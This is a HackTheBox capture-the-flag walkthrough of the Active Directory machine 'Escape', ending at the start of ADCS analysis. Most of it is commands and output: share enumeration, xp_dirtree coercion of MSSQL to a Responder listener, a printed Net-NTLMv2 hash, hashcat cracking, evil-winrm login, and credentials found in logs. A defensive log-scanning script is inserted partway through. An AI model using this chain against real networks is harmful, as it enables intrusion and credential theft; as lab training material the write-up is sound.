Escape
AD box on HTB.

Enumeration:
Port Scanning:
We will start with nmap:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.128.53
Nmap scan report for 10.129.128.53
Host is up, received echo-reply ttl 127 (0.12s latency).
Scanned at 2025-09-11 13:58:27 +03 for 284s
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-11 18:59:11Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-11T19:01:15+00:00; +8h00m04s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
| -----BEGIN CERTIFICATE-----
| MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE-----
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-11T19:01:15+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
| -----BEGIN CERTIFICATE-----
| MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE-----
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.128.53:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.128.53:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-09-11T19:01:16+00:00; +8h00m04s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-11T18:42:20
| Not valid after: 2055-09-11T18:42:20
| MD5: 0819:6d15:add6:80f6:58a8:40b0:e112:6b85
| SHA-1: 4979:7601:7304:1196:3673:6d78:ae9f:807a:bbce:d5be
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQSmZ8PTuaSZBK6Dp3OwmheTANBgkqhkiG9w0BAQsFADA7
<snipped>
|_-----END CERTIFICATE-----
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
| -----BEGIN CERTIFICATE-----
| MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-09-11T19:01:16+00:00; +8h00m04s from scanner time.
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
| -----BEGIN CERTIFICATE-----
| MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49715/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49724/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49745/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
|_clock-skew: mean: 8h00m03s, deviation: 0s, median: 8h00m03s
<snipped>
I will sync the clock with the target using ntpdate:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ sudo ntpdate 10.129.128.53
2025-09-11 22:05:18.276674 (+0300) +28803.869813 +/- 0.120404 10.129.128.53 s1 no-leap
CLOCK: time stepped by 28803.869813
Let's get the FQDN of the target:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ netexec smb 10.129.128.53
SMB 10.129.128.53 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
I will add it to the hosts file with its corresponding IP address:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
<snipped>
10.129.128.53 DC.sequel.htb sequel.htb DC
Shares:
First we will enumerate the shares with a guest session via netexec:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ netexec smb dc.sequel.htb -u 'guest' -p '' --shares
SMB 10.129.128.53 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.128.53 445 DC [+] sequel.htb\guest:
SMB 10.129.128.53 445 DC [*] Enumerated shares
SMB 10.129.128.53 445 DC Share Permissions Remark
SMB 10.129.128.53 445 DC ----- ----------- ------
SMB 10.129.128.53 445 DC ADMIN$ Remote Admin
SMB 10.129.128.53 445 DC C$ Default share
SMB 10.129.128.53 445 DC IPC$ READ Remote IPC
SMB 10.129.128.53 445 DC NETLOGON Logon server share
SMB 10.129.128.53 445 DC Public READ
SMB 10.129.128.53 445 DC SYSVOL Logon server share
We have one non-default share called Public, and we have read permissions over it.
I will use smbclient to interact with this share:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Escape/smb]
└─$ smbclient //10.129.128.53/Public
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Nov 19 14:51:25 2022
.. D 0 Sat Nov 19 14:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 16:39:43 2022
5184255 blocks of size 4096. 1466963 blocks available
smb: \> mget *
Get file SQL Server Procedures.pdf? y
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (34.2 KiloBytes/sec) (average 34.2 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Escape/smb]
└─$ open SQL\ Server\ Procedures.pdf
We have one PDF file.
Let's open it up:

We will find credentials for the newly hired employee, PublicUser:GuestUserCantWrite1, and with those credentials we can authenticate to the database.
Exploitation:
Check if those credentials are still valid using netexec:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ netexec mssql dc.sequel.htb -u PublicUser -p GuestUserCantWrite1 --local-auth
MSSQL 10.129.128.53 1433 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL 10.129.128.53 1433 DC [+] DC\PublicUser:GuestUserCantWrite1
Nice, we can see the + sign, which indicates they are still valid.
I will use impacket-mssqlclient to authenticate to the database and try to play with it:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ impacket-mssqlclient sequel.htb/publicuser:GuestUserCantWrite1@10.129.128.53
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (PublicUser guest@master)>
Enumerate the databases:
SQL (PublicUser guest@master)> select name from master..sysdatabases;
name
------
master
tempdb
model
msdb
Nothing useful; all of those databases are default ones.
MSSQL has an interesting feature: if it is misconfigured, the xp_dirtree stored procedure lets us list directories on the server, including UNC paths.
Listing directories by itself does not get us anywhere, but what we can take advantage of is that the SQL service account will authenticate to whatever UNC path we hand it; since we are on the same network, we can capture that Net-NTLMv2 authentication with Responder, just as in LLMNR poisoning.
Before executing that command we will run Responder to listen for any Net-NTLM hashes:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ sudo responder -I tun0 -dvw
[sudo] password for kali:
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.7]
Responder IPv6 [dead:beef:4::1005]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-INB06VAZIW7]
Responder Domain Name [L8LZ.LOCAL]
Responder DCE-RPC Port [46414]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
Run the command:
SQL (PublicUser guest@master)> xp_dirtree \\10.10.16.7\share\doesnotexist
subdirectory depth file
------------ ----- ----
[SMB] NTLMv2-SSP Client : 10.129.128.53
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:4c2b3e3ba4d29146:DBE407CE9436C7E96B6ECF457B7A8000:0101000000000000808145C82623DC0134CB90D74E0C86B100000000020008004C0038004C005
A0001001E00570049004E002D0049004E00420030003600560041005A0049005700370004003400570049004E002D0049004E00420030003600560041005A004900570037002E004C0038004C005A002E004C004F00
430041004C00030014004C0038004C005A002E004C004F00430041004C00050014004C0038004C005A002E004C004F00430041004C0007000800808145C82623DC01060004000200000008003000300000000000000
00000000000300000DF274434FF68EE63F87F201C8E31C8F943F0AC0D138B5D624D09CB4A7216EEEE0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E
00310036002E0037000000000000000000
[+] Exiting...
Here we received the Net-NTLMv2 hash of the account running the SQL service. If we could not crack its password, we could attempt to relay it to other services instead.
Shell as sql_svc:
Save the hash into a file and crack it using hashcat:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ hashcat sql_svc.hash --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
SQL_SVC::sequel:4c2b3e3ba4d29146:dbe407ce9436c7e96b6ecf457b7a8000:0101000000000000808145c82623dc0134cb90d74e0c86b100000000020008004c0038004c005a0001001e00570049004e002d0049004e00420030003600560041005a0049005700370004003400570049004e002d0049004e00420030003600560041005a004900570037002e004c0038004c005a002e004c004f00430041004c00030014004c0038004c005a002e004c004f00430041004c00050014004c0038004c005a002e004c004f00430041004c0007000800808145c82623dc0106000400020000000800300030000000000000000000000000300000df274434ff68ee63f87f201c8e31c8f943f0ac0d138b5d624d09cb4a7216eeee0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000:REGGIE1234ronnie
Cool, we were able to crack it, and now we have another valid username and password.
We can check whether this username and password also let us authenticate to MSSQL and, more importantly, to the machine via WinRM:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ netexec mssql dc.sequel.htb -u sql_svc -p REGGIE1234ronnie
MSSQL 10.129.128.53 1433 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL 10.129.128.53 1433 DC [+] sequel.htb\sql_svc:REGGIE1234ronnie
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ netexec winrm dc.sequel.htb -u sql_svc -p REGGIE1234ronnie
WINRM 10.129.128.53 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.128.53 5985 DC [+] sequel.htb\sql_svc:REGGIE1234ronnie (Pwn3d!)
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ evil-winrm -i 10.129.128.53 -u sql_svc -p REGGIE1234ronnie
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents>
We are authenticated as the sql_svc user.
Lateral Movement to ryan.cooper:
After doing some enumeration, we will find an interesting folder in the root of the file system:
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/1/2023 8:15 PM PerfLogs
d-r--- 2/6/2023 12:08 PM Program Files
d----- 11/19/2022 3:51 AM Program Files (x86)
d----- 11/19/2022 3:51 AM Public
d----- 2/1/2023 1:02 PM SQLServer
d-r--- 2/1/2023 1:55 PM Users
d----- 2/6/2023 7:21 AM Windows
We can navigate to that folder and view what it contains:
*Evil-WinRM* PS C:\> cd sqlserver
*Evil-WinRM* PS C:\sqlserver> dir
Directory: C:\sqlserver
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:06 AM Logs
d----- 11/18/2022 1:37 PM SQLEXPR_2019
-a---- 11/18/2022 1:35 PM 6379936 sqlexpress.exe
-a---- 11/18/2022 1:36 PM 268090448 SQLEXPR_x64_ENU.exe
*Evil-WinRM* PS C:\sqlserver>
Another interesting folder (Logs):
*Evil-WinRM* PS C:\sqlserver> cd logs
*Evil-WinRM* PS C:\sqlserver\logs> dir
Directory: C:\sqlserver\logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
We have a backup of the SQL Server error log; let's read it:
*Evil-WinRM* PS C:\sqlserver\logs> type errorlog.bak
2022-11-18 13:43:05.96 Server Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)
2022-11-18 13:43:05.97 Server UTC adjustment: -8:00
<snipped>
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
<snipped>
We will notice that some entries contain juicy information: a failed logon for sequel.htb\Ryan.Cooper is immediately followed by a failed logon for the "user" NuclearMosquito3, which looks like a password typed into the username field. Let's test that pair using netexec:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ netexec smb dc.sequel.htb -u ryan.cooper -p 'NuclearMosquito3'
SMB 10.129.128.53 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.128.53 445 DC [+] sequel.htb\ryan.cooper:NuclearMosquito3
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ netexec winrm dc.sequel.htb -u ryan.cooper -p 'NuclearMosquito3'
WINRM 10.129.128.53 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.128.53 5985 DC [+] sequel.htb\ryan.cooper:NuclearMosquito3 (Pwn3d!)
Indeed, they are still valid.
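As an added, defender-side example (not part of the original write-up): a small scanner for the log hygiene problem just exploited, where a password typed into the username field lands in ERRORLOG as a failed logon for an unknown "user" right after a failure for a real principal. The ERRORLOG lines are constructed, modelled on the excerpt above; the 'sa' and 'Typo' lines are made-up negative cases.

```python
import re
from datetime import datetime, timedelta

# Constructed ERRORLOG excerpt modelled on the lines read from C:\sqlserver\logs above.
# The Ryan.Cooper / NuclearMosquito3 pair is the page's finding; 'sa' (a known SQL login)
# and 'Typo' (a bare name minutes away from any other failure) are made-up negative cases.
SAMPLE_ERRORLOG = r"""
2022-11-18 13:43:05.96 Server      Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
2022-11-18 13:43:07.40 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
2022-11-18 13:50:01.10 Logon       Logon failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.129.0.55]
2022-11-18 13:59:30.00 Logon       Logon failed for user 'sequel.htb\sql_svc'. Reason: Password did not match that for the login provided. [CLIENT: 10.129.0.55]
2022-11-18 14:05:00.00 Logon       Logon failed for user 'Typo'. Reason: Password did not match that for the login provided. [CLIENT: 10.129.0.55]
"""

FAILED_LOGON_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})\s+Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failed_logons(text):
    """Extract timestamp, user and client from every 'Logon failed' line of an ERRORLOG."""
    events = []
    for line in text.splitlines():
        m = FAILED_LOGON_RE.match(line)
        if m:
            events.append({
                "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                "user": m["user"],
                "client": m["client"],
            })
    return events


def looks_like_principal(name, known_logins):
    """Domain-qualified names and configured SQL logins are real principals, not leaked secrets."""
    return name.lower() in known_logins or "\\" in name or "@" in name


def find_credential_leaks(text, known_logins=(), window_seconds=5):
    """Flag a failed logon whose 'user' is a bare, unknown string that follows (same client,
    within window_seconds) a failure for a real principal: the password-in-username slip."""
    known = {k.lower() for k in known_logins}
    events = parse_failed_logons(text)
    findings = []
    for prev, cur in zip(events, events[1:]):
        if looks_like_principal(cur["user"], known) or not looks_like_principal(prev["user"], known):
            continue
        if cur["client"] != prev["client"] or cur["ts"] - prev["ts"] > timedelta(seconds=window_seconds):
            continue
        findings.append({
            "line_ts": cur["ts"].isoformat(sep=" ", timespec="milliseconds"),
            "likely_account": prev["user"],   # whose password was most likely exposed
            "suspect_value": cur["user"],     # the value to purge from ERRORLOG and its .BAK copies
            "client": cur["client"],
            "action": "rotate the password of likely_account and scrub this line from all log copies",
        })
    return findings
```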
BloodHound:
It is time for bloodhound:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Escape/bloodhound]
└─$ rusthound-ce -u ryan.cooper -p NuclearMosquito3 -d sequel.htb -f dc.sequel.htb -i 10.129.128.53 -n 10.129.128.53 -P 636
---------------------------------------------------
Initializing RustHound-CE at 14:46:01 on 09/11/25
Powered by @g0h4n_0
---------------------------------------------------
[2025-09-11T11:46:01Z INFO rusthound_ce] Verbosity level: Info
[2025-09-11T11:46:01Z INFO rusthound_ce] Collection method: All
[2025-09-11T11:46:02Z INFO rusthound_ce::ldap] Connected to SEQUEL.HTB Active Directory!
[2025-09-11T11:46:02Z INFO rusthound_ce::ldap] Starting data collection...
[2025-09-11T11:46:02Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-11T11:46:04Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=sequel,DC=htb
[2025-09-11T11:46:04Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-11T11:46:06Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=sequel,DC=htb
[2025-09-11T11:46:06Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-11T11:46:08Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=sequel,DC=htb
[2025-09-11T11:46:08Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-11T11:46:09Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=sequel,DC=htb
[2025-09-11T11:46:09Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-11T11:46:09Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=sequel,DC=htb
[2025-09-11T11:46:09Z INFO rusthound_ce::api] Starting the LDAP objects parsing...
[2025-09-11T11:46:09Z INFO rusthound_ce::objects::enterpriseca] Found 12 enabled certificate templates
[2025-09-11T11:46:09Z INFO rusthound_ce::api] Parsing LDAP objects finished!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::checker] Starting checker to replace some values...
[2025-09-11T11:46:09Z INFO rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 10 users parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_users.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 61 groups parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_groups.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 1 computers parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_computers.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 1 ous parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_ous.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 3 domains parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_domains.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_gpos.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 74 containers parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_containers.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 1 ntauthstores parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_ntauthstores.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 1 aiacas parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_aiacas.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 1 rootcas parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_rootcas.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 1 enterprisecas parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_enterprisecas.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 34 certtemplates parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_certtemplates.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 3 issuancepolicies parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_issuancepolicies.json created!
RustHound-CE Enumeration Completed at 14:46:09 on 09/11/25! Happy Graphing!
Also start BloodHound:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Escape/bloodhound]
└─$ sudo bloodhound
Starting neo4j
Neo4j is not running.
<snipped>
......................................................
Bloodhound will start
IMPORTANT: It will take time, please wait...
<snipped>
opening http://127.0.0.1:8080
Upload the collected data to BloodHound.

After some exploration, we will find this attack path to Domain Admin by abusing ADCS ESC1.
Post-Exploitation:
Let's collect the ADCS data with certipy-ad, adding -vulnerable to the command so that only the vulnerable templates are shown:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ certipy-ad find -u ryan.cooper -p NuclearMosquito3 -dc-ip 10.129.128.53 -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sequel-DC-CA' via RRP
[*] Successfully retrieved CA configuration for 'sequel-DC-CA'
[*] Checking web enrollment for CA 'sequel-DC-CA' @ 'dc.sequel.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250911143138_Certipy.txt'
[*] Wrote text output to '20250911143138_Certipy.txt'
[*] Saving JSON output to '20250911143138_Certipy.json'
[*] Wrote JSON output to '20250911143138_Certipy.json'
ADCS Abuse:
Read the output:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
